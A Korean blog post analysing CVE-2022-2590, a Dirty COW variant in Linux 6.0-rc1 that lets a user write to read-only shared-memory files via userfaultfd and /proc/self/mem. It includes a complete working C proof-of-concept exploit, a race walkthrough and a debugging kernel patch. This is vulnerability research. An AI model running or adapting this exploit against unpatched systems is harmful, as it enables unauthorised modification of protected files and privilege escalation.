deayzl's blog

[Linux kernel] CVE-2022-2590, 공유 메모리에 한정된 Dirty COW 본문

1-day analysis/Linux kernel

[Linux kernel] CVE-2022-2590, 공유 메모리에 한정된 Dirty COW

deayzl 2024. 7. 31. 00:35

English version of this document is in https://github.com/hyeonjun17/CVE-2022-2590-analysis

 

GitHub - hyeonjun17/CVE-2022-2590-analysis: Dirty COW restricted to shmem in linux kernel

Dirty COW restricted to shmem in linux kernel. Contribute to hyeonjun17/CVE-2022-2590-analysis development by creating an account on GitHub.

github.com

 

 

분석 및 테스트 버전: Linux/x86 6.0.0-rc1 (commit 37887783b3fef877bf34b8992c9199864da4afcb)

Introduction:

UFFDIO_CONTINUE를 이용하여 can_follow_write_pte 함수 내의 FOLL_FORCE와 FOLL_COW, pte_dirty 조건을 모두 만족시킴으로써 read-only 공유 메모리 페이지에 임의 내용 쓰기가 가능한 취약점이다.

 

Analysis:

/*
 * FOLL_FORCE can write to even unwritable pte's, but only
 * after we've gone through a COW cycle and they are dirty.
 */
static inline bool can_follow_write_pte(pte_t pte, unsigned int flags)
{
	return pte_write(pte) ||
		((flags & FOLL_FORCE) && (flags & FOLL_COW) && pte_dirty(pte));
}

위 함수는 write 행위를 수행할 pte를 찾는 과정에서 해당 pte에 write가 가능한지를 판단한다.

다음 조건 중 하나를 만족하면 write가 가능한 pte라고 결정한다.

 

1. pte의 플래그에서 writable 하다는 정보가 있다.

2. 변수 flags에 FOLL_FORCE, FOLL_COW 플래그가 존재하며 pte의 플래그에서 dirty하다는 정보를 확인한다.

 

2번 조건을 만족시키기 위해 3가지의 flag를 설정하는 방법은 다음과 같다.

 

1. FOLL_FORCE

static ssize_t mem_rw(struct file *file, char __user *buf,
			size_t count, loff_t *ppos, int write)
{
	...

	flags = FOLL_FORCE | (write ? FOLL_WRITE : 0);

	while (count > 0) {
		size_t this_len = min_t(size_t, count, PAGE_SIZE);

		if (write && copy_from_user(page, buf, this_len)) {
			copied = -EFAULT;
			break;
		}

		this_len = access_remote_vm(mm, addr, page, this_len, flags); // __get_user_pages with FOLL_FORCE on
		if (!this_len) {
			if (!copied)
				copied = -EIO;
			break;
		}

		...
}

위 함수는 /proc/<pid>/mem에 대한 read/write를 수행하는 함수이다.

위 함수를 통해 write를 수행하면 FOLL_FORCE 플래그를 가진채로 __get_user_pages 함수에 도달할 수 있다.

FOLL_FORCE는 본래 ptrace에서 사용되는 플래그이나 다음 commit에서 이에 대한 필요성을 확인할 수 있다.

https://github.com/torvalds/linux/commit/f511c0b17b081562dca8ac5061dfa86db4c66cc2

 

"Yes, people use FOLL_FORCE ;)" · torvalds/linux@f511c0b

This effectively reverts commit 8ee74a91ac30 ("proc: try to remove use of FOLL_FORCE entirely") It turns out that people do depend on FOLL_FORCE for the /proc/<pid>/mem case, and w...

github.com

 

2. FOLL_COW

/*
 * mmap_lock must be held on entry.  If @locked != NULL and *@flags
 * does not include FOLL_NOWAIT, the mmap_lock may be released.  If it
 * is, *@locked will be set to 0 and -EBUSY returned.
 */
static int faultin_page(struct vm_area_struct *vma,
		unsigned long address, unsigned int *flags, bool unshare,
		int *locked)
{
	...

	/*
	 * The VM_FAULT_WRITE bit tells us that do_wp_page has broken COW when
	 * necessary, even if maybe_mkwrite decided not to set pte_write. We
	 * can thus safely do subsequent page lookups as if they were reads.
	 * But only do so when looping for pte_write is futile: in some cases
	 * userspace may also be wanting to write to the gotten user page,
	 * which a read fault here might prevent (a readonly page might get
	 * reCOWed by userspace write).
	 */
	if ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE))
		*flags |= FOLL_COW;
	return 0;
}

Dirty COW 취약점의 패치 중 한 부분인, faultin_page 함수 내의 FOLL_COW or연산을 이용한다.

static long __get_user_pages(struct mm_struct *mm,
		unsigned long start, unsigned long nr_pages,
		unsigned int gup_flags, struct page **pages,
		struct vm_area_struct **vmas, int *locked)
{
	...
retry:
		/*
		 * If we have a pending SIGKILL, don't keep faulting pages and
		 * potentially allocating memory.
		 */
		if (fatal_signal_pending(current)) {
			ret = -EINTR;
			goto out;
		}
		cond_resched();

		page = follow_page_mask(vma, start, foll_flags, &ctx); // can_follow_write_pte
		if (!page || PTR_ERR(page) == -EMLINK) {
			ret = faultin_page(vma, start, &foll_flags,
					   PTR_ERR(page) == -EMLINK, locked); // flags |= FOLL_COW
			switch (ret) {
			case 0:
				goto retry; // try follow page again
			case -EBUSY:
			case -EAGAIN:
				ret = 0;
				fallthrough;
			case -EFAULT:
			case -ENOMEM:
			case -EHWPOISON:
				goto out;
			}
			BUG();
		} else if (PTR_ERR(page) == -EEXIST) {
        ...
}

 

__get_user_pages 함수 내에서 faultin_page 함수를 호출하고 retry 레이블로 다시 향하도록 해야 FOLL_COW 플래그를 가진채로 can_follow_write_pte 함수에 도달할 수 있다.

 

3. pte_dirty

이 조건은 다음 commit으로 인해 만족할 수 있다.

https://github.com/torvalds/linux/commit/9ae0f87d009ca6c4aab2882641ddfc319727e3db

 

mm/shmem: unconditionally set pte dirty in mfill_atomic_install_pte · torvalds/linux@9ae0f87

Patch series "mm: A few cleanup patches around zap, shmem and uffd", v4. IMHO all of them are very nice cleanups to existing code already, they're all small and self-contained. They...

github.com

/*
 * Install PTEs, to map dst_addr (within dst_vma) to page.
 *
 * This function handles both MCOPY_ATOMIC_NORMAL and _CONTINUE for both shmem
 * and anon, and for both shared and private VMAs.
 */
int mfill_atomic_install_pte(struct mm_struct *dst_mm, pmd_t *dst_pmd,
			     struct vm_area_struct *dst_vma,
			     unsigned long dst_addr, struct page *page,
			     bool newly_allocated, bool wp_copy)
{
	...

	_dst_pte = mk_pte(page, dst_vma->vm_page_prot);
	_dst_pte = pte_mkdirty(_dst_pte); // set pte dirty unconditionally
	if (page_in_cache && !vm_shared)
		writable = false;

	...
}

 

위 패치로 인해 read-only인 공유 메모리 페이지에 대한 pte를 조건없이 dirty한 상태로 설치가 가능하다.

 

 

위 3가지의 플래그를 만족시켰다면 can_follow_write_pte 함수는 true를 반환할 것이고

static struct page *follow_page_pte(struct vm_area_struct *vma,
		unsigned long address, pmd_t *pmd, unsigned int flags,
		struct dev_pagemap **pgmap)
{
	...
    
	// true && !true == false
	if ((flags & FOLL_WRITE) && !can_follow_write_pte(pte, flags)) {
		pte_unmap_unlock(ptep, ptl);
		return NULL;
	}

	page = vm_normal_page(vma, address, pte); // get read-only shared memory page

	...

out:
	pte_unmap_unlock(ptep, ptl);
	return page;
no_page:
	pte_unmap_unlock(ptep, ptl);
	if (!pte_none(pte))
		return NULL;
	return no_page_table(vma, flags);
}

 

read-only 공유 메모리 페이지를 가져올 수 있다.

 

Race Scenario:

다음은 이후에 다루게 될 PoC로 증명된 race scenario이다.

 

madvise and read UFFDIO_CONTINUE ioctl pwrite
madvise // zap the page    
shmem_fault // read fault    
handle_userfault    
  userfaultfd_continue  
  mcontinue_atomic_pte  
  ret = shmem_getpage(inode, pgoff, &page, SGP_NOALLOC); // get page  
  mfill_atomic_install_pte  
  _dst_pte = pte_mkdirty(_dst_pte); // make pte dirty  
  set_pte_at(dst_mm, dst_addr, dst_pte, _dst_pte); // install pte mem_rw
    access_remote_vm // with FOLL_FORCE
    __get_user_pages
    can_follow_write_pte // no FOLL_COW, return 0
    faultin_page
    flags |= FOLL_COW
    retry:
madvise // zap the page   follow_page_pte
shmem_fault // read fault    
handle_userfault    
  userfaultfd_continue  
  mcontinue_atomic_pte  
  ret = shmem_getpage(inode, pgoff, &page, SGP_NOALLOC); // get page  
  mfill_atomic_install_pte  
  _dst_pte = pte_mkdirty(_dst_pte); // make pte dirty  
    can_follow_write_pte // return 1
    copy_to_user(buf, page, this_len) // write content to read-only page

 

madvise and read 루틴이 2번 실행되는데, 첫번째 실행은 __get_user_pages의 retry를 유도하고 두번째 실행은 dirty로 만든 pte를 가리키도록 유도하는 역할을 수행한다.

 

PoC and Patch:

https://www.openwall.com/lists/oss-security/2022/08/15/1

 

oss-security - Re: CVE-2022-2590: Linux kernel: Modifying shmem/tmpfs files without write permissions

[ [next>] [ [day] [month] [year] [list] Message-ID: <96f1c805-f41c-6341-5849-2e84b4587f1a@redhat.com> Date: Mon, 15 Aug 2022 08:59:02 +0200 From: David Hildenbrand To: oss-security@...ts.openwall.com Cc: "akpm@...ux-foundation.org" , Greg KH , Nadav Amit S

www.openwall.com

위 링크에서 David Hildenbrand의 reproducer를 확인할 수 있다.

그러나 위 reproducer는 정확한 race scenario를 도출하기 힘들기에 최대한 선형적인 실행을 선호하도록 reproducer를 수정하였고 그에 따라 linux kernel 소스코드 또한 수정하였다.

 

.config:

...
CONFIG_USERFAULTFD=y
CONFIG_HAVE_ARCH_USERFAULTFD_WP=y
CONFIG_HAVE_ARCH_USERFAULTFD_MINOR=y
...

 

PoC:

/*
 *
 * modified reproducer by deayzl (originally from David Hildenbrand <david@redhat.com>)
 *
 */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdint.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
#include <errno.h>
#include <stdlib.h>
#include <poll.h>
#include <pthread.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <linux/userfaultfd.h>
#include <linux/prctl.h>
#include <sys/prctl.h>

#define UFFD_FEATURE_MINOR_SHMEM		(1<<10)

#define UFFDIO_REGISTER_MODE_MINOR	((__u64)1<<2)

#define UFFD_USER_MODE_ONLY 1

#define _UFFDIO_CONTINUE		(0x07)

#define UFFDIO_CONTINUE		_IOWR(UFFDIO, _UFFDIO_CONTINUE,	\
				      struct uffdio_continue)

struct uffdio_continue {
	struct uffdio_range range;
#define UFFDIO_CONTINUE_MODE_DONTWAKE		((__u64)1<<0)
	__u64 mode;

	/*
	 * Fields below here are written by the ioctl and must be at the end:
	 * the copy_from_user will not read past here.
	 */
	__s64 mapped;
};

int mem_fd;
void *map;
int uffd;

char str[] = "AAAA";

void *write_thread_fn(void *arg)
{
	prctl(PR_SET_NAME, "pwrite");
	pwrite(mem_fd, str, strlen(str), (uintptr_t) map);
}

static void *uffd_thread_fn(void *arg)
{
	static struct uffd_msg msg;   /* Data read from userfaultfd */
	struct uffdio_continue uffdio;
	struct uffdio_range uffdio_wake;
	ssize_t nread;
	prctl(PR_SET_NAME, "uffd");

	while (1) {
		struct pollfd pollfd;
		int nready;

		pollfd.fd = uffd;
		pollfd.events = POLLIN;
		nready = poll(&pollfd, 1, -1);
		if (nready == -1) {
			fprintf(stderr, "poll() failed: %d\n", errno);
			exit(1);
		}

		nread = read(uffd, &msg, sizeof(msg));
		if (nread <= 0)
			continue;

		uffdio.range.start = (unsigned long) map;
		uffdio.range.len = 4096;
		uffdio.mode = 0;
		if (ioctl(uffd, UFFDIO_CONTINUE, &uffdio) < 0) {
			if (errno == EEXIST) {
				uffdio_wake.start = (unsigned long) map;
				uffdio_wake.len = 4096;
				if (ioctl(uffd, UFFDIO_WAKE, &uffdio_wake) < 0) {

				}
			} else {
				fprintf(stderr, "UFFDIO_CONTINUE failed: %d\n", errno);
			}
		}
	}
}

static int setup_uffd(void)
{
	struct uffdio_api uffdio_api;
	struct uffdio_register uffdio_register;

	uffd = syscall(__NR_userfaultfd,
		       O_CLOEXEC | O_NONBLOCK | UFFD_USER_MODE_ONLY);
	if (uffd < 0) {
		fprintf(stderr, "syscall(__NR_userfaultfd) failed: %d\n", errno);
		return -errno;
	}

	uffdio_api.api = UFFD_API;
	uffdio_api.features = UFFD_FEATURE_MINOR_SHMEM;
	if (ioctl(uffd, UFFDIO_API, &uffdio_api) < 0) {
		fprintf(stderr, "UFFDIO_API failed: %d\n", errno);
		return -errno;
	}

	if (!(uffdio_api.features & UFFD_FEATURE_MINOR_SHMEM)) {
		fprintf(stderr, "UFFD_FEATURE_MINOR_SHMEM missing\n");
		return -ENOSYS;
	}

	uffdio_register.range.start = (unsigned long) map;
	uffdio_register.range.len = 4096;
	uffdio_register.mode = UFFDIO_REGISTER_MODE_MINOR;
	if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) < 0) {
		fprintf(stderr, "UFFDIO_REGISTER failed: %d\n", errno);
		return -errno;
	}

	return 0;
}

static void print_content(int fd)
{
	ssize_t ret;
	char buf[80];
	int offs = 0;

	while (1) {
		ret = pread(fd, buf, sizeof(buf) - 1, offs);
		if (ret > 0) {
			buf[ret] = 0;
			printf("%s", buf);
			offs += ret;
		} else if (!ret) {
			break;
		} else {
			fprintf(stderr, "pread() failed: %d\n", errno);
		}
	}
	printf("\n");
}

int main(int argc, char *argv[])
{
	pthread_t thread1, thread2;
	int fd;

	if (argc == 2) {
		fd = open(argv[1], O_RDONLY);
		if (fd < 0) {
			fprintf(stderr, "open() failed: %d\n", errno);
			return 1;
		}
	} else {
		fprintf(stderr, "usage: %s target_file\n", argv[0]);
		return 1;
	}

	mem_fd = open("/proc/self/mem", O_RDWR);
	if (mem_fd < 0) {
		fprintf(stderr, "open(/proc/self/mem) failed: %d\n", errno);
		return 1;
	}

	map = mmap(NULL, 4096, PROT_READ, MAP_PRIVATE, fd ,0);
	if (map == MAP_FAILED) {
		fprintf(stderr, "mmap() failed: %d\n", errno);
		return 1;
	}

	if (setup_uffd())
		return 1;

	printf("Old content: \n");
	print_content(fd);

	int ret;
	int tmp;
	pthread_create(&thread1, NULL, uffd_thread_fn, NULL);
	prctl(PR_SET_NAME, "madvise");
	ret = madvise(map, 4096, MADV_DONTNEED);
	if (ret < 0) {
		fprintf(stderr, "madvise() failed: %d\n", errno);
		exit(1);
	}
	tmp = *((int *)map);
	pthread_create(&thread2, NULL, write_thread_fn, NULL);
	sleep(0.3);
	prctl(PR_SET_NAME, "madvise");
	ret = madvise(map, 4096, MADV_DONTNEED);
	if (ret < 0) {
		fprintf(stderr, "madvise() failed: %d\n", errno);
		exit(1);
	}
	tmp = *((int *)map);
	sleep(5);

	printf("New content: \n");
	print_content(fd);

	return 0;
}

 

Patch:

diff --git a/Makefile b/Makefile
index f09673b6c11d..cd952e1b49f0 100644
--- a/Makefile
+++ b/Makefile
@@ -789,7 +789,8 @@ stackp-flags-$(CONFIG_STACKPROTECTOR_STRONG)      := -fstack-protector-strong
 KBUILD_CFLAGS += $(stackp-flags-y)
 
 KBUILD_CFLAGS-$(CONFIG_WERROR) += -Werror
-KBUILD_CFLAGS-$(CONFIG_CC_NO_ARRAY_BOUNDS) += -Wno-array-bounds
+# KBUILD_CFLAGS-$(CONFIG_CC_NO_ARRAY_BOUNDS) += -Wno-array-bounds
+KBUILD_CFLAGS += -Wno-array-bounds -Wno-format
 KBUILD_CFLAGS += $(KBUILD_CFLAGS-y) $(CONFIG_CC_IMPLICIT_FALLTHROUGH)
 
 ifdef CONFIG_CC_IS_CLANG
diff --git a/fs/userfaultfd.c b/fs/userfaultfd.c
index 1c44bf75f916..004f7c391903 100644
--- a/fs/userfaultfd.c
+++ b/fs/userfaultfd.c
@@ -1450,7 +1450,7 @@ static int userfaultfd_register(struct userfaultfd_ctx *ctx,
 		 * the current one has not been updated yet.
 		 */
 		vma->vm_flags = new_flags;
-		vma->vm_userfaultfd_ctx.ctx = ctx;
+		vma->vm_userfaultfd_ctx.ctx = ctx;if((new_flags&VM_UFFD_MINOR)!=0){printk(KERN_ALERT "[userfaultfd_register] uffd registered at vma: 0x%lx as UFFDIO_REGISTER_MODE_MINOR (ctx: 0x%lx)\n", (unsigned long)vma, (unsigned long)ctx);}
 
 		if (is_vm_hugetlb_page(vma) && uffd_disable_huge_pmd_share(vma))
 			hugetlb_unshare_all_pmds(vma);
diff --git a/mm/gup.c b/mm/gup.c
index 732825157430..1f3a4a0c67b3 100644
--- a/mm/gup.c
+++ b/mm/gup.c
@@ -483,11 +483,11 @@ static int follow_pfn_pte(struct vm_area_struct *vma, unsigned long address,
  * after we've gone through a COW cycle and they are dirty.
  */
 static inline bool can_follow_write_pte(pte_t pte, unsigned int flags)
-{
+{if(!strcmp(current->comm, "pwrite")){printk(KERN_ALERT "[can_follow_write_pte/%s] res: %d(%d && %d && %d) (pte=0x%lx)\n", current->comm, pte_write(pte) || ((flags & FOLL_FORCE) && (flags & FOLL_COW) && pte_dirty(pte)), flags & FOLL_FORCE, flags & FOLL_COW, pte_dirty(pte), pte_val(pte));}
 	return pte_write(pte) ||
 		((flags & FOLL_FORCE) && (flags & FOLL_COW) && pte_dirty(pte));
 }
-
+bool do_ssleep=false;
 static struct page *follow_page_pte(struct vm_area_struct *vma,
 		unsigned long address, pmd_t *pmd, unsigned int flags,
 		struct dev_pagemap **pgmap)
@@ -505,7 +505,7 @@ static struct page *follow_page_pte(struct vm_area_struct *vma,
 retry:
 	if (unlikely(pmd_bad(*pmd)))
 		return no_page_table(vma, flags);
-
+	if(do_ssleep && !strcmp(current->comm, "pwrite")){printk(KERN_ALERT "[follow_page_pte/%s] before ssleep 1\n", current->comm);schedule_timeout_interruptible(3 * HZ);printk(KERN_ALERT "[follow_page_pte/%s] after ssleep 1\n", current->comm);do_ssleep=false;}
 	ptep = pte_offset_map_lock(mm, pmd, address, &ptl);
 	pte = *ptep;
 	if (!pte_present(pte)) {
@@ -995,6 +995,7 @@ static int faultin_page(struct vm_area_struct *vma,
 	 * which a read fault here might prevent (a readonly page might get
 	 * reCOWed by userspace write).
 	 */
+	if(!strcmp(current->comm, "pwrite")){printk(KERN_ALERT "[faultin_page/%s] if %d && %d, set flags FOLL_COW\n", current->comm, (ret & VM_FAULT_WRITE), !(vma->vm_flags & VM_WRITE));do_ssleep=true;}
 	if ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE))
 		*flags |= FOLL_COW;
 	return 0;
@@ -1190,10 +1191,10 @@ static long __get_user_pages(struct mm_struct *mm,
 		}
 		cond_resched();
 
-		page = follow_page_mask(vma, start, foll_flags, &ctx);
+		page = follow_page_mask(vma, start, foll_flags, &ctx);if(!strcmp(current->comm, "pwrite")){printk(KERN_ALERT "[__get_user_pages/%s] page: 0x%lx\n", current->comm, (unsigned long)page);}
 		if (!page || PTR_ERR(page) == -EMLINK) {
 			ret = faultin_page(vma, start, &foll_flags,
-					   PTR_ERR(page) == -EMLINK, locked);
+					   PTR_ERR(page) == -EMLINK, locked);if(!strcmp(current->comm, "pwrite")){printk(KERN_ALERT "[__get_user_pages/%s] faultin_page returns %d\n", current->comm, ret);}
 			switch (ret) {
 			case 0:
 				goto retry;
diff --git a/mm/memory.c b/mm/memory.c
index 4ba73f5aa8bb..de3ffc8ff3ab 100644
--- a/mm/memory.c
+++ b/mm/memory.c
@@ -4654,7 +4654,7 @@ static vm_fault_t do_fault(struct vm_fault *vmf)
 	if (vmf->prealloc_pte) {
 		pte_free(vm_mm, vmf->prealloc_pte);
 		vmf->prealloc_pte = NULL;
-	}
+	}if(!strcmp(current->comm, "madvise")){unsigned long tmp = vmf->pte != 0 ? pte_val(*vmf->pte) : 0;printk(KERN_ALERT "[do_fault/%s] after do_read_fault, vmf->pte: 0x%lx\n", current->comm, tmp);}
 	return ret;
 }
 
diff --git a/mm/shmem.c b/mm/shmem.c
index 5783f11351bb..370333c7fb13 100644
--- a/mm/shmem.c
+++ b/mm/shmem.c
@@ -1554,7 +1554,7 @@ static struct folio *shmem_alloc_folio(gfp_t gfp,
 	struct folio *folio;
 
 	shmem_pseudo_vma_init(&pvma, info, index);
-	folio = vma_alloc_folio(gfp, 0, &pvma, 0, false);
+	folio = vma_alloc_folio(gfp, 0, &pvma, 0, false);if(!strcmp(current->comm, "uffd")){printk(KERN_ALERT "[shmem_alloc_folio/%s] vma_alloc_folio returns folio: 0x%lx\n", current->comm, (unsigned long)folio);}
 	shmem_pseudo_vma_destroy(&pvma);
 
 	return folio;
@@ -1855,13 +1855,13 @@ static int shmem_getpage_gfp(struct inode *inode, pgoff_t index,
 	sbinfo = SHMEM_SB(inode->i_sb);
 	charge_mm = vma ? vma->vm_mm : NULL;
 
-	folio = __filemap_get_folio(mapping, index, FGP_ENTRY | FGP_LOCK, 0);
+	folio = __filemap_get_folio(mapping, index, FGP_ENTRY | FGP_LOCK, 0);//if(!strcmp(current->comm, "madvise")){printk(KERN_ALERT "[shmem_getpage_gfp/%s] __filemap_get_folio returns folio: 0x%lx\n", current->comm, (unsigned long)folio);}
 	if (folio && vma && userfaultfd_minor(vma)) {
 		if (!xa_is_value(folio)) {
 			folio_unlock(folio);
 			folio_put(folio);
-		}
-		*fault_type = handle_userfault(vmf, VM_UFFD_MINOR);
+		}if(!strcmp(current->comm, "madvise")){printk(KERN_ALERT "[shmem_getpage_gfp/%s] handle_userfault starts\n", current->comm);}
+		*fault_type = handle_userfault(vmf, VM_UFFD_MINOR);if(!strcmp(current->comm, "madvise")){printk(KERN_ALERT "[shmem_getpage_gfp/%s] handle_userfault ends\n", current->comm);}
 		return 0;
 	}
 
@@ -2013,7 +2013,7 @@ static int shmem_getpage_gfp(struct inode *inode, pgoff_t index,
 		goto unlock;
 	}
 out:
-	*pagep = folio_page(folio, index - hindex);
+	*pagep = folio_page(folio, index - hindex);if(!strcmp(current->comm, "uffd")){printk(KERN_ALERT "[shmem_getpage_gfp/%s] folio_page returns page: 0x%lx\n", current->comm, (unsigned long)*pagep);}
 	return 0;
 
 	/*
@@ -2123,7 +2123,7 @@ static vm_fault_t shmem_fault(struct vm_fault *vmf)
 	}
 
 	err = shmem_getpage_gfp(inode, vmf->pgoff, &vmf->page, SGP_CACHE,
-				  gfp, vma, vmf, &ret);
+				  gfp, vma, vmf, &ret);if(!strcmp(current->comm, "madvise")){printk(KERN_ALERT "[shmem_fault/%s] shmem_getpage_gfp(page=0x%lx) returns %d\n", current->comm, (unsigned long)vmf->page, err);}
 	if (err)
 		return vmf_error(err);
 	return ret;
diff --git a/mm/userfaultfd.c b/mm/userfaultfd.c
index 07d3befc80e4..29acbe56bf2c 100644
--- a/mm/userfaultfd.c
+++ b/mm/userfaultfd.c
@@ -70,7 +70,7 @@ int mfill_atomic_install_pte(struct mm_struct *dst_mm, pmd_t *dst_pmd,
 	pgoff_t offset, max_off;
 
 	_dst_pte = mk_pte(page, dst_vma->vm_page_prot);
-	_dst_pte = pte_mkdirty(_dst_pte);
+	_dst_pte = pte_mkdirty(_dst_pte);if(!strcmp(current->comm, "uffd")){printk(KERN_ALERT "[mfill_atomic_install_pte/%s] pte_mkdirty(page=0x%lx) (pte: 0x%lx)\n", current->comm, (unsigned long)page, pte_val(_dst_pte));}
 	if (page_in_cache && !vm_shared)
 		writable = false;
 
@@ -246,7 +246,7 @@ static int mcontinue_atomic_pte(struct mm_struct *dst_mm,
 	struct page *page;
 	int ret;
 
-	ret = shmem_getpage(inode, pgoff, &page, SGP_NOALLOC);
+	ret = shmem_getpage(inode, pgoff, &page, SGP_NOALLOC);if(!strcmp(current->comm, "uffd")){printk(KERN_ALERT "[mcontinue_atomic_pte/%s] shmem_getpage returns page: 0x%lx\n", current->comm, (unsigned long)page);}
 	/* Our caller expects us to return -EFAULT if we failed to find page. */
 	if (ret == -ENOENT)
 		ret = -EFAULT;

 

 

테스트를 위해 다음과 같은 사전작업을 진행한다.

(david의 reproducer에는 /tmp/foo로 설명되어 있지만 tmpfs는 현 버전에서 공유 메모리가 아니기에 userfaultfd register에 실패한다)

sudo -s
echo "asdf" > /dev/shm/foo
chmod 0404 /dev/shm/foo
exit

 

이후 poc를 실행하게 되면 다음과 같은 화면을 볼 수 있다.

 

 

 

references:

commit: https://github.com/torvalds/linux/commit/5535be3099717646781ce1540cf725965d680e7b

 

mm/gup: fix FOLL_FORCE COW security issue and remove FOLL_COW · torvalds/linux@5535be3

Ever since the Dirty COW (CVE-2016-5195) security issue happened, we know that FOLL_FORCE can be possibly dangerous, especially if there are races that can be exploited by user space. Right now, i...

github.com

lore.kernel patch v1: https://lore.kernel.org/linux-mm/20220808073232.8808-1-david@redhat.com/#r

 

[PATCH v1] mm/gup: fix FOLL_FORCE COW security issue and remove FOLL_COW - David Hildenbrand

 

lore.kernel.org

lore.kernel patch v2: https://lore.kernel.org/all/20220809205640.70916-1-david@redhat.com/T/#u

 

[PATCH v2] mm/gup: fix FOLL_FORCE COW security issue and remove FOLL_COW

 

lore.kernel.org

openwall: https://www.openwall.com/lists/oss-security/2022/08/08/1

 

oss-security - CVE-2022-2590: Linux kernel: Modifying shmem/tmpfs files without write permissions

 

www.openwall.com

openwall2: https://lists.openwall.net/linux-kernel/2022/08/08/418

 

linux-kernel - [PATCH v1] mm/gup: fix FOLL_FORCE COW security issue and remove FOLL_COW

Open Source and information security mailing list archives

lists.openwall.net

 

Comments